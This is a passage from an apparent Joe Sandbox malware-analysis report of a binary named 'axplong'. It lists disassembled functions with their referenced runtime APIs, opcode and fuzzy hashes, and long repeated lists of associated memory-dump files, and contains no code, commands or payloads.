                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: recv
                                                                                                                                                                                                                                                    • String ID: 7oq<
                                                                                                                                                                                                                                                    • API String ID: 1507349165-377005865
                                                                                                                                                                                                                                                    • Opcode ID: 0bb98e4a22136011e6cf41545acb449d3086b023880bf3671539a76a7322464e
                                                                                                                                                                                                                                                    • Instruction ID: 813a5df2fac7093484b53c18b38d6e7e9050dc514f4634cab7a3a3350f976c9e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bb98e4a22136011e6cf41545acb449d3086b023880bf3671539a76a7322464e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1731FB71D002089FD710DBA9DC85FEE77AAEB0C734F004266F515E7391DB75A8498BA0
                                                                                                                                                                                                                                                    Function 006728C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0067299F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: 7oq<$7oq<$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-3305904750
                                                                                                                                                                                                                                                    • Opcode ID: d90d84b6fe99d9798bc5e3a8f34e349bd853d51410bf518acb897cbd5113cd96
                                                                                                                                                                                                                                                    • Instruction ID: e5b26f5ad737f4ea579db9c40db954d251211e654d01886062d766d18293d178
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d90d84b6fe99d9798bc5e3a8f34e349bd853d51410bf518acb897cbd5113cd96
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C03193B1A10209AFDB14DF59C841B9EFBFAEF49720F14861AF414E7780E770A950CBA4
                                                                                                                                                                                                                                                    Function 00689940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0068997F
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 0068998B
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00689994
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: @yh
                                                                                                                                                                                                                                                    • API String ID: 4078500453-844070663
                                                                                                                                                                                                                                                    • Opcode ID: 239bbab548496807937efb9a4d8f1c029947b08711975f808a3c2510cb35c66e
                                                                                                                                                                                                                                                    • Instruction ID: fc9f563343905c76ac1116cedec6ba315c148089e711c32e3f007b9245137e38
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 239bbab548496807937efb9a4d8f1c029947b08711975f808a3c2510cb35c66e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94F04FB2900B009FCE74EFA0E445BA7B7EAAF84300F081A1DE69687601D774E548C7A1
                                                                                                                                                                                                                                                    Function 00672520 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00672552
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: 7oq<$P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-3549850343
                                                                                                                                                                                                                                                    • Opcode ID: 7a46c9c824531d2f9b3af0075392126e0ad55b27ea3a8d6f536cb7a2166e768e
                                                                                                                                                                                                                                                    • Instruction ID: 7024164473c034b509f2f48228fd9ced4a351b86b577db6a17662c64322ddce7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a46c9c824531d2f9b3af0075392126e0ad55b27ea3a8d6f536cb7a2166e768e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10F08271D1120DDBC714DF68D841A9EBBF6AF59304F1082AEF444A7200EA705A558B99
                                                                                                                                                                                                                                                    Function 0068D312 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0067247E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
